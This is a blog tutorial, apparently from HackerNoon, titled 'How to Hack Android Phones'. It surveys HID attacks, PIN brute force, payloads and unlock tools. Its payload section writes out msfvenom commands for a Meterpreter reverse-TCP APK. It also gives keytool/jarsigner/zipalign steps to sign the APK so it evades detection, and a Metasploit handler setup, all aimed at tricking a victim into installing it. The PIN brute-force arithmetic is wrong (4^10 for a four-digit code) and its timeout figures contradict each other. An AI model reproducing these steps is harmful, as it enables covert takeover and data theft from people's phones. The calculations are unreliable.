How to Hack Whatsapp Account With Phone Number Only

How to Hack Android Phones

HID (Human Interface Device) Attack is a scenario in which an attacker takes a programmable embedded development platform, such as an associated software package like SET (Social Engineering Toolkit), Metasploit, etc., or uses other phones and USB's which are programmed to be a RubberDucky and execute an attack. In such an attack, the hacker installs a backdoor, and by using that, he completely downloads the target's information. He can either hack into the bank account of the person or even sell them on the dark web.

@ morpheuslord

Morpheuslord

I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.

The methods used by attackers to exploit android phones are increasing. People are busy finding new vulnerabilities to exploit. Below are a few ways to hack Android phones:

• HID (Human Interface Device) Attack
• Password BruteForce
• Payloads (Custom hacking scripts)
• Factory Reset
• Bypass

HID

The HID attack is a scenario in which an attacker takes a programmable embedded development platform, such as an associated software package like SET (Social Engineering Toolkit), Metasploit, etc., or uses other phones and USB's which are programmed to be a RubberDucky and execute an attack.

In such an attack, the hacker installs a backdoor, and by using that, he completely downloads the target's information.

Using the information, he can either hack into the bank account of the person or even sell them on the dark web.

You can see how a hid attack is conducted from the

                              android infosec                          

channel

Login Bruteforce

A brute-force attack uses the trial and error method to guess the correct password of the phone.

Some important points to consider to conduct such an attack:

• Number of passwords
• The timeout
• The time it might take

The timeout:

                After 5 Wrong pin's - 30 sec delay After 1 Wrong pin's - 30 sec delay After 41 Wrong pin's - 30 sec delay                              

The number of passwords:

The total number of possible combinations for a 4 digit numeric lock can start from 4 zeros to 4 nines which means 0000-9999, so we have about :

                                  4^10                  amount of password                  or                  1048576                  passwords                  in                  total              

Time consumed:

Let's see some possibilities for our understanding:

Possibility # 1: 5 passwords wrong, a delay of 30 seconds. We need to find out how many times we get the delay in the first place and find the total time consumed.

                total delay                  1048576/5                  =                  209715.2                  times  total time                  209715.2                  *                  30                  =                  6291456                  sec                  or                  1747.6266                  hours              

Possibility # 2: 41 passwords wrong, delay 30 sec.

                total delays                  1048576                  /                  41                  =                  25,575.0243                  delays  total time consumed                  25575.0243                  *                  30                  =                  7,67,250.729                  sec                  or                  767250.729                  /                  60                  =                  12,787.5121                  min                  or                  12,787.51215                  hours                              

You can see it is almost impossible to find the person's phone's password by brute-forcing. You will be dead by the time you find the phone's password 😣.

Payloads

Payloads are simple scripts that help a hacker hack a system. So now, if I just trick the person into authorizing and installing the .apk file, which opens a back door for Meterpreter to listen on for a connection to get the system under its control.

                                                meterpreter reverse tcp payload creation command:                                          

                msfvenom –p android/meterpreter/reverse_tcp                  LHOST=Localhost                    IP                                    LPORT=LocalPort R > android_shell.apk              

Payload is -p, LHOST Localhost IP to receive a back connection (Check yours with if-config command), LPORT Localhost port on which the connection listen for the victim (we set it to 4444), R Raw format (we select .apk).

We need to provide a certificate to the .apk file to give it an identity. We need to sign a cert for a .apk file to give it recognition as an application. Without this, the .apk file will be recognized as a virus.

To assign a cert, you must follow these steps

Install:

• Keytool
• Jar signer
• Zipalign

Sign the .apk file locally:

                                  keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize                  2048                  -validity                  10000                              

Keytool making Keystore:

                                  jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked              

Signing a .apk file with JARsigner:

                 jarsigner -verify -verbose -certs android_shell.apk              

Install and use Zipalign:

                                  sudo apt-get install zipalign   or   sudo apt install zipalign              

                                  zipalign -v                  4                  android_shell.apk singed_jar.apk              

Now run the command for that is in the Metasploit console:

                use exploit/multi/handler              

And set the various parameters in Metasploit like the lhost, lport, etc. Now you need to run the command after setting the host and port type:

                type: run (and press enter)              

After you execute this code, you will receive a connection to the target system. Using this, you can access the whole system and gain full access.

Factory Reset

A flashed phone is a device where a different ROM/operating system has been flashed on top of the system that came with the phone. Often, phones can be flashed to appear unlocked, whereas, in reality, they are still carrier-branded phones that will not be compatible with our service.

For every phone, there are different methods for factory reset, the most common is to do it via the volume buttons and the power button. For example, I have an old oppo phone for which the factory reset combination is down volume button and power button and for 5 seconds and the phone is flashed.

Bypass

Bypass is a commonly used method by law enforcement like the CIA, FBI & in India, the IB & RAW use a special device as shown in the picture.

In such kind of attack's it mainly depends on the attacker using the IP_BOX, which works mainly on the bruteforcing of the target. This is mainly used by law enforcement to get into the phones of terrorist's cybercriminals and other criminals' phones.

You can use another tool known as the BashBunny from hak5. This is a mini-computer from which u can conduct a login Bruteforce attack. Unlike the other options above, this is a serious beast in its work. In a matter of hours, you can crack the most difficult of difficult passwords with ease.

Note

This tutorial is for educational purposes only. Dont try this and get into trouble.

Sources

• rapid7 ( Refered Metasploit Information and Docs )
• android infosec ( Learn About HID Attack )
• David Bombal ( Learn About Bash-Bunny )

Follow me

• Twitter: morpheuslord2
• Instagram: morpheuslord_9034
• email: [email protected]

Tags

# cybersecurity# cyber-threats# cybercrime# safety# android# android-security# web-monetization

How to Hack Whatsapp Account With Phone Number Only

Source: https://hackernoon.com/hacking-android-phones-bdk32ze

Share this post